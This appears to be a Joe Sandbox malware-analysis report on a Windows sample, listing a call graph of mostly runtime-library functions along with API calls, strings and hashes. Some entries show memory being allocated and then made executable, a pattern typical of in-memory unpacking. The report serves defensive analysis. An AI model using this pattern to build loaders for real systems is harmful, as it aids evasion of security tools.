__CreateFrameInfo 78 API calls 7794->7797 7796 c86913 __CreateFrameInfo 78 API calls 7795->7796 7798 c86f78 7796->7798 7800 c86f83 7797->7800 7798->7784 7799 c891a7 __FrameHandler3::FrameUnwindToState 68 API calls 7801 c86fa6 7799->7801 7800->7798 7800->7799 7802 c85a25 CatchGuardHandler 5 API calls 7801->7802 7803 c86fbb ___CxxFrameHandler 7802->7803 7804 c87015 7803->7804 7807 c86fc6 7803->7807 7811 c86eb7 RtlUnwind 7803->7811 7812 c86d91 7804->7812 7807->7784 7809 c86913 __CreateFrameInfo 78 API calls 7808->7809 7810 c866ae 7809->7810 7810->7788 7811->7804 7813 c86da1 7812->7813 7814 c86db3 __InternalCxxFrameHandler 7812->7814 7813->7807 7815 c86913 __CreateFrameInfo 78 API calls 7814->7815 7815->7813 7817 c86913 __CreateFrameInfo 78 API calls 7816->7817 7818 c87e82 7817->7818 7819 c890eb _unexpected 68 API calls 7818->7819 7820 c87e98 7819->7820 6719 c88a7b 6722 c888af 6719->6722 6723 c888dc 6722->6723 6724 c888ee 6722->6724 6749 c856fa GetModuleHandleW 6723->6749 6734 c8875f 6724->6734 6729 c8892b 6733 c88940 6735 c8876b __FrameHandler3::FrameUnwindToState 6734->6735 6757 c8b43d EnterCriticalSection 6735->6757 6737 c88775 6758 c887c7 6737->6758 6739 c88782 6762 c887a0 6739->6762 6742 c88946 6841 c88977 6742->6841 6744 c88950 6745 c88964 6744->6745 6746 c88954 GetCurrentProcess TerminateProcess 6744->6746 6747 c88990 __FrameHandler3::FrameUnwindToState 3 API calls 6745->6747 6746->6745 6748 c8896c ExitProcess 6747->6748 6750 c85706 6749->6750 6750->6724 6751 c88990 GetModuleHandleExW 6750->6751 6752 c889cf GetProcAddress 6751->6752 6753 c889f0 6751->6753 6752->6753 6756 c889e3 6752->6756 6754 c888ed 6753->6754 6755 c889f6 FreeLibrary 6753->6755 6754->6724 6755->6754 6756->6753 6757->6737 6759 c887d3 __FrameHandler3::FrameUnwindToState 6758->6759 6761 c88837 __FrameHandler3::FrameUnwindToState 6759->6761 6765 c88eb4 6759->6765 6761->6739 6840 c8b485 LeaveCriticalSection 6762->6840 6764 c8878e 6764->6729 6764->6742 6766 c88ec0 __EH_prolog3 6765->6766 6769 c88c0c 6766->6769 6768 c88ee7 __FrameHandler3::FrameUnwindToState 6768->6761 6770 c88c18 __FrameHandler3::FrameUnwindToState 6769->6770 6777 c8b43d EnterCriticalSection 6770->6777 6772 c88c26 6778 c88dc4 6772->6778 6777->6772 6779 c88c33 6778->6779 6780 c88de3 6778->6780 6782 c88c5b 6779->6782 6780->6779 6785 c89e01 6780->6785 6839 c8b485 LeaveCriticalSection 6782->6839 6784 c88c44 6784->6768 6786 c89e0c HeapFree 6785->6786 6790 c89e36 6785->6790 6787 c89e21 GetLastError 6786->6787 6786->6790 6788 c89e2e __dosmaperr 6787->6788 6791 c89d91 6788->6791 6790->6779 6794 c898f1 GetLastError 6791->6794 6793 c89d96 6793->6790 6795 c8990d 6794->6795 6796 c89907 6794->6796 6800 c89911 SetLastError 6795->6800 6822 c8c3b2 6795->6822 6817 c8c373 6796->6817 6800->6793 6804 c89946 6807 c8c3b2 __dosmaperr 6 API calls 6804->6807 6805 c89957 6806 c8c3b2 __dosmaperr 6 API calls 6805->6806 6808 c89963 6806->6808 6811 c89954 6807->6811 6809 c8997e 6808->6809 6810 c89967 6808->6810 6834 c895ce 6809->6834 6812 c8c3b2 __dosmaperr 6 API calls 6810->6812 6813 c89e01 ___free_lconv_mon 12 API calls 6811->6813 6812->6811 6813->6800 6816 c89e01 ___free_lconv_mon 12 API calls 6816->6800 6818 c8c211 __dosmaperr 5 API calls 6817->6818 6819 c8c38f 6818->6819 6820 c8c3aa TlsGetValue 6819->6820 6821 c8c398 6819->6821 6821->6795 6823 c8c211 __dosmaperr 5 API calls 6822->6823 6824 c8c3ce 6823->6824 6825 c8c3ec TlsSetValue 6824->6825 6826 c89929 6824->6826 6826->6800 6827 c89da4 6826->6827 6832 c89db1 __dosmaperr 6827->6832 6828 c89df1 6831 c89d91 __dosmaperr 13 API calls 6828->6831 6829 c89ddc HeapAlloc 6830 c8993e 6829->6830 6829->6832 6830->6804 6830->6805 6831->6830 6832->6828 6832->6829 6833 c8c647 __dosmaperr EnterCriticalSection LeaveCriticalSection 6832->6833 6833->6832 6835 c89462 __dosmaperr EnterCriticalSection LeaveCriticalSection 6834->6835 6836 c8963c 6835->6836 6837 c89574 __dosmaperr 14 API calls 6836->6837 6838 c89665 6837->6838 6838->6816 6839->6784 6840->6764 6844 c8b4c1 6841->6844 6843 c8897c __FrameHandler3::FrameUnwindToState 6843->6744 6845 c8b4d0 __FrameHandler3::FrameUnwindToState 6844->6845 6846 c8b4dd 6845->6846 6848 c8c296 6845->6848 6846->6843 6851 c8c211 6848->6851 6852 c8c241 6851->6852 6855 c8c23d 6851->6855 6852->6855 6858 c8c146 6852->6858 6855->6846 6856 c8c25b GetProcAddress 6856->6855 6857 c8c26b __dosmaperr 6856->6857 6857->6855 6864 c8c157 ___vcrt_FlsFree 6858->6864 6859 c8c175 LoadLibraryExW 6861 c8c190 GetLastError 6859->6861 6862 c8c1f4 6859->6862 6860 c8c1ed 6860->6855 6860->6856 6861->6864 6862->6860 6863 c8c206 FreeLibrary 6862->6863 6863->6860 6864->6859 6864->6860 6865 c8c1c3 LoadLibraryExW 6864->6865 6865->6862 6865->6864 7308 c8547b 7311 c8544e 7308->7311 7312 c8545d 7311->7312 7313 c85464 7311->7313 7317 c88e9e 7312->7317 7320 c88f1b 7313->7320 7316 c85462 7318 c88f1b 32 API calls 7317->7318 7319 c88eb0 7318->7319 7319->7316 7323 c88c67 7320->7323 7324 c88c73 __FrameHandler3::FrameUnwindToState 7323->7324 7331 c8b43d EnterCriticalSection 7324->7331 7326 c88c81 7332 c88cc2 7326->7332 7328 c88c8e 7342 c88cb6 7328->7342 7331->7326 7333 c88cdd 7332->7333 7335 c88d50 __dosmaperr 7332->7335 7334 c88d30 7333->7334 7333->7335 7345 c8c517 7333->7345 7334->7335 7337 c8c517 32 API calls 7334->7337 7335->7328 7339 c88d46 7337->7339 7338 c88d26 7340 c89e01 ___free_lconv_mon 14 API calls 7338->7340 7341 c89e01 ___free_lconv_mon 14 API calls 7339->7341 7340->7334 7341->7335 7394 c8b485 LeaveCriticalSection 7342->7394 7344 c88c9f 7344->7316 7346 c8c53f 7345->7346 7347 c8c524 7345->7347 7348 c8c54e 7346->7348 7354 c8ddc6 7346->7354 7347->7346 7349 c8c530 7347->7349 7361 c8ddf9 7348->7361 7351 c89d91 __dosmaperr 14 API calls 7349->7351 7353 c8c535 __FrameHandler3::FrameUnwindToState 7351->7353 7353->7338 7355 c8ddd1 7354->7355 7356 c8dde6 HeapSize 7354->7356 7357 c89d91 __dosmaperr 14 API calls 7355->7357 7356->7348 7358 c8ddd6 7357->7358 7359 c89cb0 ___std_exception_copy 29 API calls 7358->7359 7360 c8dde1 7359->7360 7360->7348 7362 c8de11 7361->7362 7363 c8de06 7361->7363 7365 c8de19 7362->7365 7371 c8de22 __dosmaperr 7362->7371 7373 c8bbef 7363->7373 7366 c89e01 ___free_lconv_mon 14 API calls 7365->7366 7369 c8de0e 7366->7369 7367 c8de4c HeapReAlloc 7367->7369 7367->7371 7368 c8de27 7370 c89d91 __dosmaperr 14 API calls 7368->7370 7369->7353 7370->7369 7371->7367 7371->7368 7380 c8c647 7371->7380 7374 c8bc2d 7373->7374 7378 c8bbfd __dosmaperr 7373->7378 7375 c89d91 __dosmaperr 14 API calls 7374->7375 7377 c8bc2b 7375->7377 7376 c8bc18 HeapAlloc 7376->7377 7376->7378 7377->7369 7378->7374 7378->7376 7379 c8c647 __dosmaperr 2 API calls 7378->7379 7379->7378 7383 c8c673 7380->7383 7384 c8c67f __FrameHandler3::FrameUnwindToState 7383->7384 7389 c8b43d EnterCriticalSection 7384->7389 7386 c8c68a __FrameHandler3::FrameUnwindToState 7390 c8c6c1 7386->7390 7389->7386 7393 c8b485 LeaveCriticalSection 7390->7393 7392 c8c652 7392->7371 7393->7392 7394->7344 8688 c8b3fc 8690 c8b407 8688->8690 8691 c8b430 8690->8691 8692 c8b42c 8690->8692 8694 c8c3f4 8690->8694 8699 c8b454 8691->8699 8695 c8c211 __dosmaperr 5 API calls 8694->8695 8696 c8c410 8695->8696 8697 c8c42e InitializeCriticalSectionAndSpinCount 8696->8697 8698 c8c419 8696->8698 8697->8698 8698->8690 8700 c8b480 8699->8700 8701 c8b461 8699->8701 8700->8692 8702 c8b46b DeleteCriticalSection 8701->8702 8702->8700 8702->8702 7844 c881b1 7845 c881c8 7844->7845 7867 c881c1 7844->7867 7846 c881e9 7845->7846 7847 c881d3 7845->7847 7874 c8ae05 7846->7874 7850 c89d91 __dosmaperr 14 API calls 7847->7850 7852 c881d8 7850->7852 7854 c89cb0 ___std_exception_copy 29 API calls 7852->7854 7854->7867 7859 c8824b 7861 c89d91 __dosmaperr 14 API calls 7859->7861 7860 c88257 7862 c882ee 68 API calls 7860->7862 7863 c88250 7861->7863 7864 c8826d 7862->7864 7866 c89e01 ___free_lconv_mon 14 API calls 7863->7866 7864->7863 7865 c88291 7864->7865 7868 c882a8 7865->7868 7869 c882b2 7865->7869 7866->7867 7870 c89e01 ___free_lconv_mon 14 API calls 7868->7870 7872 c89e01 ___free_lconv_mon 14 API calls 7869->7872 7871 c882b0 7870->7871 7873 c89e01 ___free_lconv_mon 14 API calls 7871->7873 7872->7871 7873->7867 7875 c881ef 7874->7875 7876 c8ae0e 7874->7876 7880 c8a7e8 GetModuleFileNameW 7875->7880 7902 c8985b 7876->7902 7881 c8a828 7880->7881 7882 c8a817 GetLastError 7880->7882 8106 c8a566 7881->8106 8101 c89d37 7882->8101 7885 c8a823 7888 c85a25 CatchGuardHandler 5 API calls 7885->7888 7889 c88202 7888->7889 7890 c882ee 7889->7890 7892 c88314 7890->7892 7894 c88372 7892->7894 8145 c8b136 7892->8145 7893 c88235 7896 c88462 7893->7896 7894->7893 7895 c8b136 68 API calls 7894->7895 7895->7894 7897 c88242 7896->7897 7898 c88473 7896->7898 7897->7859 7897->7860 7898->7897 7899 c89da4 __dosmaperr 14 API calls 7898->7899 7900 c8849c 7899->7900 7901 c89e01 ___free_lconv_mon 14 API calls 7900->7901 7901->7897 7903 c89866 7902->7903 7907 c8986c 7902->7907 7905 c8c373 __dosmaperr 6 API calls 7903->7905 7904 c8c3b2 __dosmaperr 6 API calls 7906 c89886 7904->7906 7905->7907 7908 c89872 7906->7908 7909 c89da4 __dosmaperr 14 API calls 7906->7909 7907->7904 7907->7908 7910 c891a7 __FrameHandler3::FrameUnwindToState 68 API calls 7908->7910 7911 c89877 7908->7911 7912 c89896 7909->7912 7913 c898f0 7910->7913 7927 c8ac10 7911->7927 7914 c8989e 7912->7914 7915 c898b3 7912->7915 7916 c8c3b2 __dosmaperr 6 API calls 7914->7916 7917 c8c3b2 __dosmaperr 6 API calls 7915->7917 7918 c898aa 7916->7918 7919 c898bf 7917->7919 7924 c89e01 ___free_lconv_mon 14 API calls 7918->7924 7920 c898d2 7919->7920 7921 c898c3 7919->7921 7923 c895ce __dosmaperr 14 API calls 7920->7923 7922 c8c3b2 __dosmaperr 6 API calls 7921->7922 7922->7918 7925 c898dd 7923->7925 7924->7908 7926 c89e01 ___free_lconv_mon 14 API calls 7925->7926 7926->7911 7928 c8ad65 __FrameHandler3::FrameUnwindToState 68 API calls 7927->7928 7929 c8ac3a 7928->7929 7950 c8a997 7929->7950 7932 c8ac53 7932->7875 7933 c8bbef 15 API calls 7934 c8ac64 7933->7934 7935 c8ac7a 7934->7935 7936 c8ac6c 7934->7936 7957 c8ae60 7935->7957 7938 c89e01 ___free_lconv_mon 14 API calls 7936->7938 7938->7932 7940 c8accd 7944 c8acf9 7940->7944 7949 c89e01 ___free_lconv_mon 14 API calls 7940->7949 7941 c8acb2 7942 c89d91 __dosmaperr 14 API calls 7941->7942 7943 c8acb7 7942->7943 7946 c89e01 ___free_lconv_mon 14 API calls 7943->7946 7945 c8ad42 7944->7945 7968 c8a889 7944->7968 7948 c89e01 ___free_lconv_mon 14 API calls 7945->7948 7946->7932 7948->7932 7949->7944 7976 c8a49b 7950->7976 7952 c8a9a9 7953 c8a9b8 GetOEMCP 7952->7953 7954 c8a9ca 7952->7954 7956 c8a9e1 7953->7956 7955 c8a9cf GetACP 7954->7955 7954->7956 7955->7956 7956->7932 7956->7933 7958 c8a997 70 API calls 7957->7958 7959 c8ae80 7958->7959 7960 c8af85 7959->7960 7961 c8aebd IsValidCodePage 7959->7961 7966 c8aed8 __FrameHandler3::FrameUnwindToState 7959->7966 7962 c85a25 CatchGuardHandler 5 API calls 7960->7962 7961->7960 7963 c8aecf 7961->7963 7964 c8aca7 7962->7964 7965 c8aef8 GetCPInfo 7963->7965 7963->7966 7964->7940 7964->7941 7965->7960 7965->7966 7992 c8aa6b 7966->7992 7969 c8a895 __FrameHandler3::FrameUnwindToState 7968->7969 8075 c8b43d EnterCriticalSection 7969->8075 7971 c8a89f 8076 c8a8d6 7971->8076 7977 c8a4b9 7976->7977 7983 c8a4b2 7976->7983 7978 c897a0 _unexpected 68 API calls 7977->7978 7977->7983 7979 c8a4da 7978->7979 7984 c8d205 7979->7984 7983->7952 7985 c8d218 7984->7985 7987 c8a4f0 7984->7987 7986 c8c027 __FrameHandler3::FrameUnwindToState 68 API calls 7985->7986 7985->7987 7986->7987 7988 c8d263 7987->7988 7989 c8d28b 7988->7989 7990 c8d276 7988->7990 7989->7983 7990->7989 7991 c8ae4d __FrameHandler3::FrameUnwindToState 68 API calls 7990->7991 7991->7989 7993 c8aa93 GetCPInfo 7992->7993 7994 c8ab5c 7992->7994 7993->7994 7999 c8aaab 7993->7999 7996 c85a25 CatchGuardHandler 5 API calls 7994->7996 7997 c8ac0e 7996->7997 7997->7960 8003 c8bc3d 7999->8003 8002 c8dca3 70 API calls 8002->7994 8004 c8a49b 68 API calls 8003->8004 8005 c8bc5d 8004->8005 8023 c8b1ff 8005->8023 8007 c8bd19 8010 c85a25 CatchGuardHandler 5 API calls 8007->8010 8008 c8bd11 8026 c8bd3e 8008->8026 8009 c8bc8a 8009->8007 8009->8008 8012 c8bbef 15 API calls 8009->8012 8014 c8bcaf __FrameHandler3::FrameUnwindToState 8009->8014 8013 c8ab13 8010->8013 8012->8014 8018 c8dca3 8013->8018 8014->8008 8015 c8b1ff __FrameHandler3::FrameUnwindToState MultiByteToWideChar 8014->8015 8016 c8bcf8 8015->8016 8016->8008 8017 c8bcff GetStringTypeW 8016->8017 8017->8008 8019 c8a49b 68 API calls 8018->8019 8020 c8dcb6 8019->8020 8032 c8dab4 8020->8032 8030 c8b167 8023->8030 8027 c8bd4a 8026->8027 8028 c8bd5b 8026->8028 8027->8028 8029 c89e01 ___free_lconv_mon 14 API calls 8027->8029 8028->8007 8029->8028 8031 c8b178 MultiByteToWideChar 8030->8031 8031->8009 8033 c8dacf 8032->8033 8034 c8b1ff __FrameHandler3::FrameUnwindToState MultiByteToWideChar 8033->8034 8037 c8db13 8034->8037 8035 c8dc8e 8036 c85a25 CatchGuardHandler 5 API calls 8035->8036 8038 c8ab34 8036->8038 8037->8035 8039 c8bbef 15 API calls 8037->8039 8041 c8db39 8037->8041 8052 c8dbe1 8037->8052 8038->8002 8039->8041 8040 c8bd3e __freea 14 API calls 8040->8035 8042 c8b1ff __FrameHandler3::FrameUnwindToState MultiByteToWideChar 8041->8042 8041->8052 8043 c8db82 8042->8043 8043->8052 8060 c8c43f 8043->8060 8046 c8dbb8 8051 c8c43f 6 API calls 8046->8051 8046->8052 8047 c8dbf0 8048 c8dc79 8047->8048 8049 c8bbef 15 API calls 8047->8049 8053 c8dc02 8047->8053 8050 c8bd3e __freea 14 API calls 8048->8050 8049->8053 8050->8052 8051->8052 8052->8040 8053->8048 8054 c8c43f 6 API calls 8053->8054 8055 c8dc45 8054->8055 8055->8048 8056 c8b2b9 __FrameHandler3::FrameUnwindToState WideCharToMultiByte 8055->8056 8057 c8dc5f 8056->8057 8057->8048 8058 c8dc68 8057->8058 8059 c8bd3e __freea 14 API calls 8058->8059 8059->8052 8066 c8c112 8060->8066 8064 c8c450 8064->8046 8064->8047 8064->8052 8065 c8c490 LCMapStringW 8065->8064 8067 c8c211 __dosmaperr 5 API calls 8066->8067 8068 c8c128 8067->8068 8068->8064 8069 c8c49c 8068->8069 8072 c8c12c 8069->8072 8071 c8c4a7 8071->8065 8073 c8c211 __dosmaperr 5 API calls 8072->8073 8074 c8c142 8073->8074 8074->8071 8075->7971 8086 c8b065 8076->8086 8078 c8a8f8 8079 c8b065 29 API calls 8078->8079 8080 c8a917 8079->8080 8081 c8a8ac 8080->8081 8082 c89e01 ___free_lconv_mon 14 API calls 8080->8082 8083 c8a8ca 8081->8083 8082->8081 8100 c8b485 LeaveCriticalSection 8083->8100 8085 c8a8b8 8085->7945 8087 c8b076 8086->8087 8091 c8b072 CatchIt 8086->8091 8088 c8b07d 8087->8088 8093 c8b090 __FrameHandler3::FrameUnwindToState 8087->8093 8089 c89d91 __dosmaperr 14 API calls 8088->8089 8090 c8b082 8089->8090 8092 c89cb0 ___std_exception_copy 29 API calls 8090->8092 8091->8078 8092->8091 8093->8091 8094 c8b0be 8093->8094 8096 c8b0c7 8093->8096 8095 c89d91 __dosmaperr 14 API calls 8094->8095 8098 c8b0c3 8095->8098 8096->8091 8097 c89d91 __dosmaperr 14 API calls 8096->8097 8097->8098 8099 c89cb0 ___std_exception_copy 29 API calls 8098->8099 8099->8091 8100->8085 8102 c89d7e __dosmaperr 14 API calls 8101->8102 8103 c89d42 __dosmaperr 8102->8103 8104 c89d91 __dosmaperr 14 API calls 8103->8104 8105 c89d55 8104->8105 8105->7885 8107 c8a49b 68 API calls 8106->8107 8108 c8a578 8107->8108 8109 c8a58a 8108->8109 8132 c8c2d6 8108->8132 8111 c8a6eb 8109->8111 8112 c8a6f8 8111->8112 8113 c8a707 8111->8113 8112->7885 8114 c8a70f 8113->8114 8115 c8a734 8113->8115 8114->8112 8138 c8a7ad 8114->8138 8116 c8b2b9 __FrameHandler3::FrameUnwindToState WideCharToMultiByte 8115->8116 8118 c8a744 8116->8118 8119 c8a74b GetLastError 8118->8119 8120 c8a761 8118->8120 8121 c89d37 __dosmaperr 14 API calls 8119->8121 8122 c8a772 8120->8122 8123 c8a7ad 14 API calls 8120->8123 8125 c8a757 8121->8125 8122->8112 8142 c8a542 8122->8142 8123->8122 8127 c89d91 __dosmaperr 14 API calls 8125->8127 8127->8112 8128 c8a78c GetLastError 8129 c89d37 __dosmaperr 14 API calls 8128->8129 8130 c8a798 8129->8130 8131 c89d91 __dosmaperr 14 API calls 8130->8131 8131->8112 8135 c8c0f8 8132->8135 8136 c8c211 __dosmaperr 5 API calls 8135->8136 8137 c8c10e 8136->8137 8137->8109 8139 c8a7b8 8138->8139 8140 c89d91 __dosmaperr 14 API calls 8139->8140 8141 c8a7c1 8140->8141 8141->8112 8143 c8b2b9 __FrameHandler3::FrameUnwindToState WideCharToMultiByte 8142->8143 8144 c8a55f 8143->8144 8144->8112 8144->8128 8148 c8b0e6 8145->8148 8149 c8a49b 68 API calls 8148->8149 8150 c8b0f9 8149->8150 8150->7892 8222 c866f1 8223 c86703 8222->8223 8224 c86715 8222->8224 8223->8224 8226 c8670b 8223->8226 8225 c86913 __CreateFrameInfo 78 API calls 8224->8225 8227 c8671a 8225->8227 8228 c86713 8226->8228 8229 c86913 __CreateFrameInfo 78 API calls 8226->8229 8227->8228 8230 c86913 __CreateFrameInfo 78 API calls 8227->8230 8231 c86733 8229->8231 8230->8228 8232 c86913 __CreateFrameInfo 78 API calls 8231->8232 8233 c8673e 8232->8233 8234 c890eb _unexpected 68 API calls 8233->8234 8235 c86746 8234->8235 8734 c88fb4 8737 c8901c 8734->8737 8738 c89030 8737->8738 8739 c88fc7 8737->8739 8738->8739 8740 c89e01 ___free_lconv_mon 14 API calls 8738->8740 8740->8739 8803 c8c334 8804 c8c211 __dosmaperr 5 API calls 8803->8804 8805 c8c350 8804->8805 8806 c8c359 8805->8806 8807 c8c36b TlsFree 8805->8807 8236 c8c2f5 8237 c8c211 __dosmaperr 5 API calls 8236->8237 8238 c8c311 8237->8238 8239 c8c329 TlsAlloc 8238->8239 8240 c8c31a 8238->8240 8239->8240 8248 c852b5 8249 c852be 8248->8249 8256 c85845 IsProcessorFeaturePresent 8249->8256 8253 c852cf 8254 c8654d ___scrt_uninitialize_crt 7 API calls 8253->8254 8255 c852d3 8253->8255 8254->8255 8257 c852ca 8256->8257 8258 c8652e 8257->8258 8266 c86a01 8258->8266 8261 c86537 8261->8253 8263 c8653f 8264 c8654a 8263->8264 8265 c86a3d ___vcrt_uninitialize_locks DeleteCriticalSection 8263->8265 8264->8253 8265->8261 8267 c86a0a 8266->8267 8269 c86a33 8267->8269 8271 c86533 8267->8271 8280 c86c7d 8267->8280 8270 c86a3d ___vcrt_uninitialize_locks DeleteCriticalSection 8269->8270 8270->8271 8271->8261 8272 c869b3 8271->8272 8285 c86b8e 8272->8285 8275 c869c8 8275->8263 8276 c86c3f ___vcrt_FlsSetValue 6 API calls 8277 c869d6 8276->8277 8278 c869e3 8277->8278 8279 c869e6 ___vcrt_uninitialize_ptd 6 API calls 8277->8279 8278->8263 8279->8275 8281 c86aa3 ___vcrt_FlsFree 5 API calls 8280->8281 8282 c86c97 8281->8282 8283 c86cb5 InitializeCriticalSectionAndSpinCount 8282->8283 8284 c86ca0 8282->8284 8283->8284 8284->8267 8286 c86aa3 ___vcrt_FlsFree 5 API calls 8285->8286 8287 c86ba8 8286->8287 8288 c86bc1 TlsAlloc 8287->8288 8289 c869bd 8287->8289 8289->8275 8289->8276 8536 c85235 8539 c854dd 8536->8539 8538 c8523a 8538->8538 8540 c854f3 8539->8540 8542 c854fc 8540->8542 8543 c85490 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8540->8543 8542->8538 8543->8542 8511 c90277 8512 c90280 8511->8512 8513 c906f8 __startOneArgErrorHandling 20 API calls 8512->8513 8514 c902a0 8513->8514 6888 c868f7 6889 c8690e 6888->6889 6890 c86901 6888->6890 6890->6889 6892 c89127 6890->6892 6893 c89e01 ___free_lconv_mon 14 API calls 6892->6893 6894 c8913f 6893->6894 6894->6889

                                              Control-flow Graph

                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,3B9ACA00), ref: 00C84E6D
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C84E74
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00C84EA5
                                              • _wcsrchr.LIBVCRUNTIME ref: 00C84EB8
                                              • lstrlenW.KERNEL32(-00000002), ref: 00C84EDD
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C84F14
                                              • RtlFreeHeap.NTDLL(00000000), ref: 00C84F1B
                                              • MulDiv.KERNEL32(00000001,80000000,80000000), ref: 00C84F30
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1327837803.0000000000C31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C30000, based on PE: true
                                              • Associated: 0000000A.00000002.1327818880.0000000000C30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327880482.0000000000C92000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327897453.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327912247.0000000000CA9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327928478.0000000000CAB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_c30000_V3.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$Process$AllocateFileFreeModuleName_wcsrchrlstrlen
                                              • String ID: $($@
                                              • API String ID: 443335681-2581157662
                                              • Opcode ID: f572c1157a40fc79fb1e3378acdf66bb6eb54ce023bfa7fd48d1129143011883
                                              • Instruction ID: 31653608bbe2e733ee5052eb89c65844150127c5ce14f85305215a88bb4c4cf3
                                              • Opcode Fuzzy Hash: f572c1157a40fc79fb1e3378acdf66bb6eb54ce023bfa7fd48d1129143011883
                                              • Instruction Fuzzy Hash: F421D472900312AEE73973A8AC4EB6F26689F0636DF210059FA16D71D1EA648E40C76D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 26 c8c146-c8c152 27 c8c1e4-c8c1e7 26->27 28 c8c1ed 27->28 29 c8c157-c8c168 27->29 30 c8c1ef-c8c1f3 28->30 31 c8c16a-c8c16d 29->31 32 c8c175-c8c18e LoadLibraryExW 29->32 33 c8c20d-c8c20f 31->33 34 c8c173 31->34 35 c8c190-c8c199 GetLastError 32->35 36 c8c1f4-c8c204 32->36 33->30 38 c8c1e1 34->38 39 c8c19b-c8c1ad call c89428 35->39 40 c8c1d2-c8c1df 35->40 36->33 37 c8c206-c8c207 FreeLibrary 36->37 37->33 38->27 39->40 43 c8c1af-c8c1c1 call c89428 39->43 40->38 43->40 46 c8c1c3-c8c1d0 LoadLibraryExW 43->46 46->36 46->40
                                              APIs
                                              • FreeLibrary.KERNEL32(00000000,?,00C8C255,00C8CAD9,?,00000000,00000000,00000000,?,00C8C3CE,00000022,FlsSetValue,00CA4078,00CA4080,00000000), ref: 00C8C207
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1327837803.0000000000C31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C30000, based on PE: true
                                              • Associated: 0000000A.00000002.1327818880.0000000000C30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327880482.0000000000C92000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327897453.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327912247.0000000000CA9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327928478.0000000000CAB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_c30000_V3.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID: api-ms-$ext-ms-
                                              • API String ID: 3664257935-537541572
                                              • Opcode ID: bd9fd0d3a6cd147285edde4e9d5680331a2c7931fb2ea0ca725024f1fa39553c
                                              • Instruction ID: ebe723da7224d1c711086bee3dce5b37ab1ee528aa231b8f4bfef491a51f52a4
                                              • Opcode Fuzzy Hash: bd9fd0d3a6cd147285edde4e9d5680331a2c7931fb2ea0ca725024f1fa39553c
                                              • Instruction Fuzzy Hash: CC21A131A41121ABCB21AB65DCC9B6E7769EB427ACF250114ED25A7291D730EF00C7F5
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 00C92314
                                                • Part of subcall function 00C92098: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 00C920C1
                                                • Part of subcall function 00C92098: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00C9226D
                                              • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 00C92366
                                              • VirtualProtect.KERNELBASE(0000002C,?,00000040,0000002C), ref: 00C923C0
                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00C923F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000003.1322581708.0000000000C92000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00C92000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_3_c92000_V3.jbxd
                                              Similarity
                                              • API ID: Virtual$Alloc$Free$Protect
                                              • String ID: ,
                                              • API String ID: 1004437363-3772416878
                                              • Opcode ID: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                              • Instruction ID: f89365abc64248be6907363aa4133c029b2b2ca6de5e108b616e42768d0fb864
                                              • Opcode Fuzzy Hash: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                              • Instruction Fuzzy Hash: D851F875900609AFCF10DFA9C885B9EBBF8FF08354F10851AF969A7240D370EA54CBA4

                                              Control-flow Graph

                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 00C92314
                                                • Part of subcall function 00C92098: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 00C920C1
                                                • Part of subcall function 00C92098: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00C9226D
                                              • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 00C92366
                                              • VirtualProtect.KERNELBASE(0000002C,?,00000040,0000002C), ref: 00C923C0
                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00C923F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1327880482.0000000000C92000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00C30000, based on PE: true
                                              • Associated: 0000000A.00000002.1327818880.0000000000C30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327837803.0000000000C31000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327897453.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327912247.0000000000CA9000.00000004.00000001.01000000.0000000A.sdmpDownload File
